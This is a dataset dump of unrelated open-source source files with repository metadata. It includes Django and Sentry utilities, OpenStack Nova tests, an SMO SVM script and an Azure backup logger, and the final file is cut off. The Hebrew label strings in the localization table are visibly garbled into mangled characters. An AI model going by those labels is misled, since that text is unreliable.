repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
yosinv/anyway
|
localization.py
|
2
|
8011
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import csv
import os
import field_names
_tables = {
"SUG_DEREH": {
1: "ืขืืจืื ื ืืฆืืืช",
2: "ืขืืจืื ื ืื ืืฆืืืช",
3: "ืื ืขืืจืื ื ืืฆืืืช",
4: "ืื ืขืืจืื ื ืื ืืฆืืืช",
},
"YEHIDA": {
11: "ืืจืื ืืืฃ (ืืืคื)",
12: "ืืจืื ืืืื",
14: "ืืจืื ืขืืงืื",
20: "ืืจืื ืช\"ื",
33: "ืืจืื ืืืืช",
34: "ืืจืื ืื ืื",
36: "ืืจืื ืฉืืฉืื (ืขื 1999)",
37: "ืืจืื ืฉืืฉืื (ืืื ื-2004)",
38: "ืืจืื ืืืืฉ",
41: "ืืจืื ืฉืืืจืื",
43: "ืืจืื ืืืืื",
51: "ืืจืื ืืฉืจืื",
52: "ืืจืื ืืฉืคืื",
61: "ืืืื ืืจืืฉืืื",
},
"SUG_YOM": {
1: "ืื",
2: "ืขืจื ืื",
3: "ืืื ืืืืขื",
4: "ืืื ืืืจ",
},
"HUMRAT_TEUNA": {
1: "ืงืืื ืืช",
2: "ืงืฉื",
3: "ืงืื",
},
"SUG_TEUNA": {
1: "ืคืืืขื ืืืืื ืจืื",
2: "ืืชื ืืฉืืช ืืืืช ืื ืฆื",
3: "ืืชื ืืฉืืช ืืืืช ืืืืืจ",
4: "ืืชื ืืฉืืช ืฆื ืืฆื",
5: "ืืชื ืืฉืืช ืืืืช ืื ืืืืช",
6: "ืืชื ืืฉืืช ืขื ืจืื ืฉื ืขืฆืจ ืืื ืื ืื",
7: "ืืชื ืืฉืืช ืขื ืจืื ืืื ื",
8: "ืืชื ืืฉืืช ืขื ืขืฆื ืืืื",
9: "ืืจืืื ืืืืืืฉ ืื ืขืืืื ืืืืจืื",
10: "ืืชืืคืืืช",
11: "ืืืืงื",
12: "ืคืืืขื ืื ืืกืข ืืชืื ืืื ืจืื",
13: "ื ืคืืื ืืจืื ื ืข",
14: "ืฉืจืืคื",
15: "ืืืจ",
17: "ืืชื ืืฉืืช ืืืืจ ืื ืืืืช",
18: "ืืชื ืืฉืืช ืืืืจ ืื ืฆื",
19: "ืืชื ืืฉืืช ืขื ืืขื ืืืื",
20: "ืคืืืขื ืืืืขื ืฉื ืจืื",
},
"ZURAT_DEREH": {
1: "ืื ืืกื ืืืืืฃ",
2: "ืืืฆืืื ืืืืืฃ",
3: "ื.ืื ืื/ืช. ืืืง",
4: "ืฉืืคืืข ืชืืื",
5: "ืขืงืื ืื",
6: "ืขื ืืฉืจ ืื ืืจื",
7: "ืืคืืฉ ืืกืืืช ืืจืื",
8: "ืืืืฉ ืืฉืจ/ืฆืืืช",
9: "ืืืจ",
},
"HAD_MASLUL": {
1: "ืื ืกืืืจื",
2: "ืื ืกืืืจื+ืงื ืืคืจืื ืจืฆืืฃ",
3: "ืื ืกืืืจื ืืื ืงื ืืคืจืื ืจืฆืืฃ",
4: "ืืืจ",
},
"RAV_MASLUL": {
1: "ืืืคืจืื ืืกืืื ืช ืืฆืืข",
2: "ืืืคืจืื ืขื ืืืจ ืืืืืืช",
3: "ืืืคืจืื ืื ืืื ืืื ืืืจ ืืืืืืช",
4: "ืืืคืจืื ืื ืื ืืื",
5: "ืืืจ",
},
"MEHIRUT_MUTERET": {
1: "ืขื 50 ืงื\"ืฉ",
2: "60 ืงื\"ืฉ",
3: "70 ืงื\"ืฉ",
4: "80 ืงื\"ืฉ",
5: "90 ืงื\"ืฉ",
6: "100 ืงื\"ืฉ",
},
"TKINUT": {
1: "ืืื ืืืงืื",
2: "ืฉืืืืื ืืจืืขืื",
3: "ืืืืฉ ืืฉืืืฉ",
4: "ืฉืืืืื ืืจืืขืื ืืืืืฉ ืืฉืืืฉ",
},
"ROHAV": {
1: "ืขื 5 ืืืจ",
2: "5 ืขื 7",
3: "7 ืขื 10.5",
4: "10.5 ืขื 14",
5: "ืืืชืจ ื-14",
},
"SIMUN_TIMRUR": {
1: "ืกืืืื ืืงืื/ืืกืจ",
2: "ืชืืืจืืจ ืืงืื/ืืกืจ",
3: "ืืื ืืืงืื",
4: "ืื ื ืืจืฉ ืชืืจืืจ",
},
"TEURA": {
1: "ืืืจ ืืื ืจืืื",
2: "ืจืืืช ืืืืืืช ืขืงื ืืื ืืืืจ (ืขืฉื,ืขืจืคื)",
3: "ืืืื ืคืขืื ืชืืืจื",
4: "ืงืืืืช ืชืืืจื ืืืชื ืชืงืื ื/ืื ืคืืขืืช",
5: "ืืืื ืื ืงืืืืช ืชืืืจื",
},
"BAKARA": {
1: "ืืื ืืงืจื",
2: "ืจืืืืจ ืชืงืื",
3: "ืจืืืืจ ืืืืื ืฆืืื",
4: "ืจืืืืจ ืื ืชืงืื",
5: "ืชืืจืืจ ืขืฆืืจ",
6: "ืชืืจืืจ ืืืืช ืงืืืื",
7: "ืืืจ",
},
"MEZEG_AVIR": {
1: "ืืืืจ",
2: "ืืฉืื",
3: "ืฉืจืื",
4: "ืขืจืคืืื",
5: "ืืืจ",
},
"PNE_KVISH": {
1: "ืืืฉ",
2: "ืจืืื ืืืื",
3: "ืืจืื ืืืืืจ ืืืง",
4: "ืืืืกื ืืืืฅ",
5: "ืืื ืื ืืฆืฅ ืขื ืืืืืฉ",
6: "ืืืจ",
},
"SUG_EZEM": {
1: "ืขืฅ",
2: "ืขืืื ืืฉืื/ืชืืืจื/ืืืคืื",
3: "ืชืืจืืจ ืืฉืื",
4: "ืืฉืจ ืกืืื ืื ืืืืื ืื",
5: "ืืื ื",
6: "ืืืจ ืืืืืืช ืืจืื",
7: "ืืืืช",
8: "ืืืจ",
},
"MERHAK_EZEM": {
1: "ืขื ืืืจ",
2: "1-3 ืืืจ",
3: "ืขื ืืืืืฉ",
4: "ืขื ืฉืื ืืคืจืื",
},
"LO_HAZA": {
1: "ืืื ืืืืืื ืืชื ืืขื",
2: "ืืื ื ืื",
3: "ืฉืืืง ืขื ืืืืืฉ",
4: "ืขืื ืขื ืืืืืฉ",
5: "ืืื ืขื ืื ืืคืจืื",
6: "ืืื ืขื ืฉืืืืื/ืืืจืื",
7: "ืืืจ",
},
"OFEN_HAZIYA": {
1: "ืืชืคืจืฅ ืื ืืืืืฉ",
2: "ืืฆื ืฉืืื ืืืกืชืจ",
3: "ืืฆื ืจืืื",
4: "ืืืจ",
},
"MEKOM_HAZIYA": {
1: "ืื ืืืขืืจ ืืฆืื ืืื ืฆืืืช",
2: "ืื ืืืขืืจ ืืฆืื ืื ืืื ืฆืืืช",
3: "ืืืขืืจ ืืฆืื ืืื ืจืืืืจ",
4: "ืืืขืืจ ืืฆืื ืขื ืจืืืืจ",
},
"KIVUN_HAZIYA": {
1: "ืืืืื ืืฉืืื",
2: "ืืฉืืื ืืืืื",
},
"STATUS_IGUN": {
1: "ืขืืืื ืืืืืง",
2: "ืืจืื ืืฉืื",
3: "ืืจืื ืืจื",
4: "ืืจืื ืงืืืืืืจ",
9: "ืื ืขืืื",
}
}
_fields = {
"pk_teuna_fikt": "ืืืื",
"SUG_DEREH": "ืกืื ืืจื",
"SHEM_ZOMET": "ืฉื ืฆืืืช",
"SEMEL_YISHUV": "ืืฉืื", # from dictionary
"REHOV1": "ืจืืื 1", # from dicstreets (with SEMEL_YISHUV)
"REHOV2": "ืจืืื 2", # from dicstreets (with SEMEL_YISHUV)
"BAYIT": "ืืกืคืจ ืืืช",
"ZOMET_IRONI": "ืฆืืืช ืขืืจืื ื", # from intersect urban dictionary
"KVISH1": "ืืืืฉ 1", # from intersect urban dictionary
"KVISH2": "ืืืืฉ 2", #from intersect urban dictionary
"ZOMET_LO_IRONI": "ืฆืืืช ืื ืขืืจืื ื", #from non urban dictionary
"YEHIDA": "ืืืืื",
"SUG_YOM": "ืกืื ืืื",
"RAMZOR": "ืจืืืืจ",
"HUMRAT_TEUNA": "ืืืืจืช ืชืืื ื",
"SUG_TEUNA": "ืกืื ืชืืื ื",
"ZURAT_DEREH": "ืฆืืจืช ืืจื",
"HAD_MASLUL": "ืื ืืกืืื",
"RAV_MASLUL": "ืจื ืืกืืื",
"MEHIRUT_MUTERET": "ืืืืจืืช ืืืชืจืช",
"TKINUT": "ืชืงืื ืืช",
"ROHAV": "ืจืืื",
"SIMUN_TIMRUR": "ืกืืืื ืชืืจืืจ",
"TEURA": "ืชืืืจื",
"BAKARA": "ืืงืจื",
"MEZEG_AVIR": "ืืื ืืืืืจ",
"MEZEG_AVIR_UNITED": "ืืื ืืืืืจ",
"PNE_KVISH": "ืคื ื ืืืืฉ",
"SUG_EZEM": "ืกืื ืขืฆื",
"MERHAK_EZEM": "ืืจืืง ืขืฆื",
"LO_HAZA": "ืื ืืฆื",
"OFEN_HAZIYA": "ืืืคื ืืฆืื",
"MEKOM_HAZIYA": "ืืงืื ืืฆืื",
"KIVUN_HAZIYA": "ืืืืื ืืฆืื",
"STATUS_IGUN": "ืขืืืื",
"MAHOZ": "ืืืื",
"NAFA": "ื ืคื",
"EZOR_TIVI": "ืืืืจ ืืืขื",
"MAAMAD_MINIZIPALI": "ืืขืื ืืื ืืฆืืคืื",
"ZURAT_ISHUV": "ืฆืืจืช ืืืฉืื"
}
_cities = list(csv.DictReader(open(os.path.join("static/data/cities.csv"))))
_cities_names = {int(x[field_names.sign]): x[field_names.name].decode('cp1255') for x in _cities}
def get_field(field, value=None):
if value:
table = _tables.get(field, None)
return table.get(value, None) if table else None
return _fields.get(field, None)
def get_supported_tables():
return _tables.keys()
def get_city_name(symbol_id):
return _cities_names.get(symbol_id, None)
|
bsd-3-clause
|
Kryz/sentry
|
src/sentry/management/commands/export.py
|
23
|
4653
|
from __future__ import absolute_import, print_function
import sys
from django.core import serializers
from django.core.management.base import BaseCommand
from django.db.models import get_apps
def sort_dependencies(app_list):
"""
Similar to Django's except that we discard the important of natural keys
when sorting dependencies (i.e. it works without them).
"""
from django.db.models import get_model, get_models
# Process the list of models, and get the list of dependencies
model_dependencies = []
models = set()
for app, model_list in app_list:
if model_list is None:
model_list = get_models(app)
for model in model_list:
models.add(model)
# Add any explicitly defined dependencies
if hasattr(model, 'natural_key'):
deps = getattr(model.natural_key, 'dependencies', [])
if deps:
deps = [get_model(*d.split('.')) for d in deps]
else:
deps = []
# Now add a dependency for any FK relation with a model that
# defines a natural key
for field in model._meta.fields:
if hasattr(field.rel, 'to'):
rel_model = field.rel.to
if rel_model != model:
deps.append(rel_model)
# Also add a dependency for any simple M2M relation with a model
# that defines a natural key. M2M relations with explicit through
# models don't count as dependencies.
for field in model._meta.many_to_many:
rel_model = field.rel.to
if rel_model != model:
deps.append(rel_model)
model_dependencies.append((model, deps))
model_dependencies.reverse()
# Now sort the models to ensure that dependencies are met. This
# is done by repeatedly iterating over the input list of models.
# If all the dependencies of a given model are in the final list,
# that model is promoted to the end of the final list. This process
# continues until the input list is empty, or we do a full iteration
# over the input models without promoting a model to the final list.
# If we do a full iteration without a promotion, that means there are
# circular dependencies in the list.
model_list = []
while model_dependencies:
skipped = []
changed = False
while model_dependencies:
model, deps = model_dependencies.pop()
# If all of the models in the dependency list are either already
# on the final model list, or not on the original serialization list,
# then we've found another model with all it's dependencies satisfied.
found = True
for candidate in ((d not in models or d in model_list) for d in deps):
if not candidate:
found = False
if found:
model_list.append(model)
changed = True
else:
skipped.append((model, deps))
if not changed:
raise RuntimeError("Can't resolve dependencies for %s in serialized app list." %
', '.join('%s.%s' % (model._meta.app_label, model._meta.object_name)
for model, deps in sorted(skipped, key=lambda obj: obj[0].__name__))
)
model_dependencies = skipped
return model_list
class Command(BaseCommand):
help = 'Exports core metadata for the Sentry installation.'
def yield_objects(self):
app_list = [(a, None) for a in get_apps()]
# Collate the objects to be serialized.
for model in sort_dependencies(app_list):
if not getattr(model, '__core__', True):
sys.stderr.write(">> Skipping model <%s>\n" % (model.__name__,))
continue
if model._meta.proxy:
sys.stderr.write(">> Skipping model <%s>\n" % (model.__name__,))
continue
queryset = model._base_manager.order_by(model._meta.pk.name)
for obj in queryset.iterator():
yield obj
def handle(self, dest=None, **options):
if not dest:
sys.stderr.write('Usage: sentry export [dest]')
sys.exit(1)
if dest == '-':
dest = sys.stdout
else:
dest = open(dest, 'wb')
sys.stderr.write('>> Beggining export\n')
serializers.serialize("json", self.yield_objects(), indent=2, stream=dest,
use_natural_keys=True)
|
bsd-3-clause
|
rschnapka/commission
|
sale_commission/partner.py
|
3
|
1581
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011 Pexego Sistemas Informรกticos (<http://www.pexego.es>). All Rights Reserved
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
"""aรฑadimos algรบn campo relacionado con el intrastat"""
from osv import fields, orm
class res_partner(orm.Model):
"""aรฑadimos algรบn campo relacionado con elas comisiones"""
_name = "res.partner"
_inherit = "res.partner"
_columns = {
'commission_ids': fields.one2many('res.partner.agent', 'partner_id', 'Agents'),
'agent': fields.boolean('Creditor/Agent',
help="If you check this field will be available as creditor or agent.")
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
routeflow/AutomaticConfigurationRouteFlow
|
POX_CONTROLLER/tests/unit/module_load_test.py
|
46
|
1777
|
#!/usr/bin/env python
#
# Copyright 2011-2012 Andreas Wundsam
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" A simple nose based test unit test that discovers all modules in the pox directory and tries to load them """
import sys
from os import path
import os
import unittest
SCRIPT_DIR=path.dirname(path.abspath(__file__))
ROOT=path.abspath(path.join(SCRIPT_DIR,"../.."))
sys.path.append(os.path.dirname(__file__) + "/../..")
packages = {}
modules = []
for root, dirs, files in os.walk(ROOT):
assert root.startswith(ROOT)
root = root[len(ROOT)+1:]
if not root.startswith("pox"): continue
if not path.exists(path.join(root, "__init__.py")):
continue
modules.append(root.replace(path.sep,"."))
files = [f for f in files if f.endswith(".py") and not f.startswith("__init__") and f != "setup.py"]
#print root
for f in files:
packagename = root.replace(path.sep,".")
modules.append( packagename + "." + f[:-3])
def test_load_modules():
# This is a test /generator/. It yields a separate loading test for each module
# Nosetests is required
for module in modules:
yield load_module, module
def load_module(module):
loaded_module = __import__(module)
if __name__ == '__main__':
import nose
nose.main(defaultTest=__name__)
|
apache-2.0
|
joker946/nova
|
nova/tests/unit/api/openstack/test_api_version_request.py
|
48
|
4954
|
# Copyright 2014 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.openstack import api_version_request
from nova import exception
from nova import test
class APIVersionRequestTests(test.NoDBTestCase):
def test_valid_version_strings(self):
def _test_string(version, exp_major, exp_minor):
v = api_version_request.APIVersionRequest(version)
self.assertEqual(v.ver_major, exp_major)
self.assertEqual(v.ver_minor, exp_minor)
_test_string("1.1", 1, 1)
_test_string("2.10", 2, 10)
_test_string("5.234", 5, 234)
_test_string("12.5", 12, 5)
_test_string("2.0", 2, 0)
_test_string("2.200", 2, 200)
def test_null_version(self):
v = api_version_request.APIVersionRequest()
self.assertTrue(v.is_null())
def test_invalid_version_strings(self):
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "2")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "200")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "2.1.4")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "200.23.66.3")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "5 .3")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "5. 3")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "5.03")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "02.1")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "2.001")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, " 2.1")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "2.1 ")
def test_version_comparisons(self):
v1 = api_version_request.APIVersionRequest("2.0")
v2 = api_version_request.APIVersionRequest("2.5")
v3 = api_version_request.APIVersionRequest("5.23")
v4 = api_version_request.APIVersionRequest("2.0")
v_null = api_version_request.APIVersionRequest()
self.assertTrue(v1 < v2)
self.assertTrue(v3 > v2)
self.assertTrue(v1 != v2)
self.assertTrue(v1 == v4)
self.assertTrue(v1 != v_null)
self.assertTrue(v_null == v_null)
self.assertRaises(TypeError, v1.__cmp__, "2.1")
def test_version_matches(self):
v1 = api_version_request.APIVersionRequest("2.0")
v2 = api_version_request.APIVersionRequest("2.5")
v3 = api_version_request.APIVersionRequest("2.45")
v4 = api_version_request.APIVersionRequest("3.3")
v5 = api_version_request.APIVersionRequest("3.23")
v6 = api_version_request.APIVersionRequest("2.0")
v7 = api_version_request.APIVersionRequest("3.3")
v8 = api_version_request.APIVersionRequest("4.0")
v_null = api_version_request.APIVersionRequest()
self.assertTrue(v2.matches(v1, v3))
self.assertTrue(v2.matches(v1, v_null))
self.assertTrue(v1.matches(v6, v2))
self.assertTrue(v4.matches(v2, v7))
self.assertTrue(v4.matches(v_null, v7))
self.assertTrue(v4.matches(v_null, v8))
self.assertFalse(v1.matches(v2, v3))
self.assertFalse(v5.matches(v2, v4))
self.assertFalse(v2.matches(v3, v1))
self.assertRaises(ValueError, v_null.matches, v1, v3)
def test_get_string(self):
v1_string = "3.23"
v1 = api_version_request.APIVersionRequest(v1_string)
self.assertEqual(v1_string, v1.get_string())
self.assertRaises(ValueError,
api_version_request.APIVersionRequest().get_string)
|
apache-2.0
|
webnotes/wnframework
|
webnotes/widgets/page.py
|
34
|
1572
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
import webnotes.model.doc
import webnotes.model.code
@webnotes.whitelist()
def get(name):
"""
Return the :term:`doclist` of the `Page` specified by `name`
"""
page = webnotes.bean("Page", name)
page.run_method("get_from_files")
return page.doclist
@webnotes.whitelist(allow_guest=True)
def getpage():
"""
Load the page from `webnotes.form` and send it via `webnotes.response`
"""
page = webnotes.form_dict.get('name')
doclist = get(page)
if has_permission(doclist):
# load translations
if webnotes.lang != "en":
from webnotes.modules import get_doc_path
from webnotes.translate import get_lang_data
d = doclist[0]
messages = get_lang_data(get_doc_path(d.module, d.doctype, d.name),
webnotes.lang, 'js')
webnotes.response["__messages"] = messages
webnotes.response['docs'] = doclist
else:
webnotes.response['403'] = 1
raise webnotes.PermissionError, 'No read permission for Page %s' % \
(doclist[0].title or page, )
def has_permission(page_doclist):
if webnotes.user.name == "Administrator" or "System Manager" in webnotes.user.get_roles():
return True
page_roles = [d.role for d in page_doclist if d.fields.get("doctype")=="Page Role"]
if webnotes.user.name == "Guest" and not (page_roles and "Guest" in page_roles):
return False
elif page_roles and not (set(page_roles) & set(webnotes.user.get_roles())):
return False
return True
|
mit
|
mattrobenolt/django
|
tests/model_formsets/test_uuid.py
|
45
|
1295
|
from django.forms.models import inlineformset_factory
from django.test import TestCase
from .models import UUIDPKChild, UUIDPKParent
class InlineFormsetTests(TestCase):
def test_inlineformset_factory_nulls_default_pks(self):
"""
#24377 - If we're adding a new object, a parent's auto-generated pk
from the model field default should be ignored as it's regenerated on
the save request.
"""
FormSet = inlineformset_factory(UUIDPKParent, UUIDPKChild, fields='__all__')
formset = FormSet()
self.assertIsNone(formset.forms[0].fields['parent'].initial)
def test_inlineformset_factory_ignores_default_pks_on_submit(self):
"""
#24377 - Inlines with a model field default should ignore that default
value to avoid triggering validation on empty forms.
"""
FormSet = inlineformset_factory(UUIDPKParent, UUIDPKChild, fields='__all__')
formset = FormSet({
'uuidpkchild_set-TOTAL_FORMS': 3,
'uuidpkchild_set-INITIAL_FORMS': 0,
'uuidpkchild_set-MAX_NUM_FORMS': '',
'uuidpkchild_set-0-name': 'Foo',
'uuidpkchild_set-1-name': '',
'uuidpkchild_set-2-name': '',
})
self.assertTrue(formset.is_valid())
|
bsd-3-clause
|
shipEZ/flaskApp
|
lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/chardetect.py
|
1786
|
2504
|
#!/usr/bin/env python
"""
Script which takes one or more file paths and reports on their detected
encodings
Example::
% chardetect somefile someotherfile
somefile: windows-1252 with confidence 0.5
someotherfile: ascii with confidence 1.0
If no paths are provided, it takes its input from stdin.
"""
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import sys
from io import open
from chardet import __version__
from chardet.universaldetector import UniversalDetector
def description_of(lines, name='stdin'):
"""
Return a string describing the probable encoding of a file or
list of strings.
:param lines: The lines to get the encoding of.
:type lines: Iterable of bytes
:param name: Name of file or collection of lines
:type name: str
"""
u = UniversalDetector()
for line in lines:
u.feed(line)
u.close()
result = u.result
if result['encoding']:
return '{0}: {1} with confidence {2}'.format(name, result['encoding'],
result['confidence'])
else:
return '{0}: no result'.format(name)
def main(argv=None):
'''
Handles command line arguments and gets things started.
:param argv: List of arguments, as if specified on the command-line.
If None, ``sys.argv[1:]`` is used instead.
:type argv: list of str
'''
# Get command line arguments
parser = argparse.ArgumentParser(
description="Takes one or more file paths and reports their detected \
encodings",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
conflict_handler='resolve')
parser.add_argument('input',
help='File whose encoding we would like to determine.',
type=argparse.FileType('rb'), nargs='*',
default=[sys.stdin])
parser.add_argument('--version', action='version',
version='%(prog)s {0}'.format(__version__))
args = parser.parse_args(argv)
for f in args.input:
if f.isatty():
print("You are running chardetect interactively. Press " +
"CTRL-D twice at the start of a blank line to signal the " +
"end of your input. If you want help, run chardetect " +
"--help\n", file=sys.stderr)
print(description_of(f, f.name))
if __name__ == '__main__':
main()
|
mit
|
tshi04/machine-learning-codes
|
SVM-SMO/smo_svm2.py
|
1
|
4990
|
'''
Created on Mar 10, 2017
@author: Tian Shi
'''
import numpy as np
import matplotlib.pyplot as plt
np.random.seed(10)
class SMOSVM(object):
'''
SMO SVM
'''
def __init__(self, data, C=10.0, max_iter=1000, err=1e-8):
'''
Constructor
'''
self.data = data
self.C = C
self.max_iter = max_iter
self.err = err
self.n_point = len(data)
self.n_dim = len(data[0])-1
self.init()
def init(self):
self.X = np.zeros([self.n_point,self.n_dim])
self.y = np.zeros(self.n_point)
for kk in range(self.n_point):
for jj in range(self.n_dim):
self.X[kk,jj] = self.data[kk][jj]
self.y[kk] = self.data[kk][self.n_dim]
self.alpha = np.zeros(self.n_point)
self.w = np.dot(self.alpha*self.y, self.X)
self.b = 0.0
def iterater(self):
print '-------------------------------'
itit = 0
while itit < self.max_iter:
print itit,
cnt = 0
for j in range(self.n_point):
E_j = self.cal_E(self.X[j], self.y[j])
if (self.y[j]*E_j < -self.err and self.alpha[j] < self.C) or (self.y[j]*E_j > self.err and self.alpha[j] > 0.0):
i = np.random.randint(self.n_point)
if i == j:
continue
E_i = self.cal_E(self.X[i], self.y[i])
alpha_old_j = self.alpha[j]
alpha_old_i = self.alpha[i]
LB, HB = self.cal_LB_HB(self.y[i], self.y[j], self.alpha[i], self.alpha[j])
if LB == HB:
continue
eta = 2.0*self.X[i].dot(self.X[j]) - self.X[i].dot(self.X[i]) - self.X[j].dot(self.X[j])
if eta >= 0:
continue
self.alpha[i] = self.alpha[i] - (self.y[i])*(E_j-E_i)/eta
self.alpha[i] = np.minimum(self.alpha[i], HB)
self.alpha[i] = np.maximum(self.alpha[i], LB)
if np.abs(self.alpha[i]-alpha_old_i) <= 1e-5:
continue
self.alpha[j] = self.alpha[j] + self.y[i]*self.y[j]*(alpha_old_i-self.alpha[i])
b1 = 0
l1 = 0
if self.alpha[i] < self.C and self.alpha[i] > 0:
l1 = 1
b1 = self.b - E_i - self.y[j]*(self.alpha[j]-alpha_old_j)*self.X[j].dot(self.X[i]) - self.y[i]*(self.alpha[i]-alpha_old_i)*self.X[j].dot(self.X[j])
b2 = 0
l2 = 0
if self.alpha[j] < self.C and self.alpha[j] > 0:
l2 = 1
b2 = self.b - E_j - self.y[j]*(self.alpha[j]-alpha_old_j)*self.X[j].dot(self.X[j]) - self.y[i]*(self.alpha[i]-alpha_old_i)*self.X[i].dot(self.X[j])
if l1 == 1 and l2 == 1:
self.b = 0.5*(b1+b2)
else:
if l1 == 1:
self.b = b1
if l2 == 1:
self.b = b2
cnt += 1
if cnt == 0:
itit += 1
else:
itit = 0
print self.alpha
def cal_w(self):
self.w = np.dot(self.alpha*self.y, self.X)
def get_para(self):
return self.w, self.b
def get_X(self):
return self.X
def cal_E(self, x_j, y_j):
return np.dot(self.alpha*self.y,self.X.dot(x_j)) + self.b - y_j
def cal_LB_HB(self, y_i, y_j, alpha_old_i, alpha_old_j):
LB = 0
HB = 0
if y_i != y_j:
LB = np.maximum(0, alpha_old_i - alpha_old_j)
HB = np.minimum(self.C, self.C + alpha_old_i - alpha_old_j)
else:
LB = np.maximum(0, alpha_old_i + alpha_old_j - self.C)
HB = np.minimum(self.C, alpha_old_i + alpha_old_j)
return LB, HB
if __name__ == '__main__':
arr = [[1,1,1],[2,2,1],[2,0,1],[2,1,1],[0,0,-1],[1,0,-1],[0,1,-1],[-1,-1,-1]]
myproj = SMOSVM(arr, C=10.0, max_iter=1000)
myproj.iterater()
myproj.cal_w()
w,b = myproj.get_para()
print w, b
x = np.linspace(-1.0, 2.0, 10.0)
y = -w[0]/w[1]*x - b/w[1]
plt.plot(x,y)
plt.scatter(1,1,color='g')
plt.scatter(2,2,color='g')
plt.scatter(2,0,color='g')
plt.scatter(2,1,color='g')
plt.scatter(0,0,color='r')
plt.scatter(1,0,color='r')
plt.scatter(0,1,color='r')
plt.scatter(-1,-1,color='r')
plt.xlabel('x')
plt.ylabel('y')
plt.show()
print 'Normal Terminate'
|
gpl-3.0
|
boumenot/azure-linux-extensions
|
VMBackup/main/backuplogger.py
|
2
|
3155
|
#!/usr/bin/env python
#
# VM Backup extension
#
# Copyright 2014 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.7+
#
import datetime
import httplib
import os
import string
import time
import traceback
import urlparse
from blobwriter import BlobWriter
from Utils.WAAgentUtil import waagent
class Backuplogger(object):
def __init__(self, hutil):
self.msg = ''
self.con_path = '/dev/console'
self.hutil = hutil
"""description of class"""
def log(self, msg, local=False, level='Info'):
log_msg = "{0} {1} {2} \n".format(str(datetime.datetime.now()) , level , msg)
self.log_to_con(log_msg)
if(local):
self.hutil.log(log_msg)
else:
self.msg += log_msg
def log_to_con(self, msg):
try:
with open(self.con_path, "w") as C :
message = filter(lambda x : x in string.printable, msg)
C.write(message.encode('ascii','ignore'))
except IOError as e:
pass
def commit(self, logbloburi):
#commit to local file system first, then commit to the network.
self.hutil.log(self.msg)
blobWriter = BlobWriter(self.hutil)
# append the wala log at the end.
try:
# distro information
if(self.hutil is not None and self.hutil.patching is not None and self.hutil.patching.distro_info is not None):
distro_str = ""
if(len(self.hutil.patching.distro_info)>1):
distro_str = self.hutil.patching.distro_info[0] + " " + self.hutil.patching.distro_info[1]
else:
distro_str = self.hutil.patching.distro_info[0]
self.msg = "Distro Info:" + distro_str + "\n" + self.msg
self.msg = "Guest Agent Version is :" + waagent.GuestAgentVersion + "\n" + self.msg
with open("/var/log/waagent.log", 'rb') as file:
file.seek(0, os.SEEK_END)
length = file.tell()
seek_len_abs = 1024 * 10
if(length < seek_len_abs):
seek_len_abs = length
file.seek(0 - seek_len_abs, os.SEEK_END)
tail_wala_log = file.read()
self.msg = self.msg + "Tail of WALA Log:" + tail_wala_log
except Exception as e:
errMsg = 'Failed to get the waagent log with error: %s, stack trace: %s' % (str(e), traceback.format_exc())
self.hutil.log(errMsg)
blobWriter.WriteBlob(self.msg, logbloburi)
def commit_to_local(self):
self.hutil.log(self.msg)
|
apache-2.0
|
blackoutjack/jamweaver
|
util/resultsutil.py
|
1
|
4333
|
class Section:
# properties:
# name
# info
# headers
# rows
# total
# errors
def __init__(self, name, info):
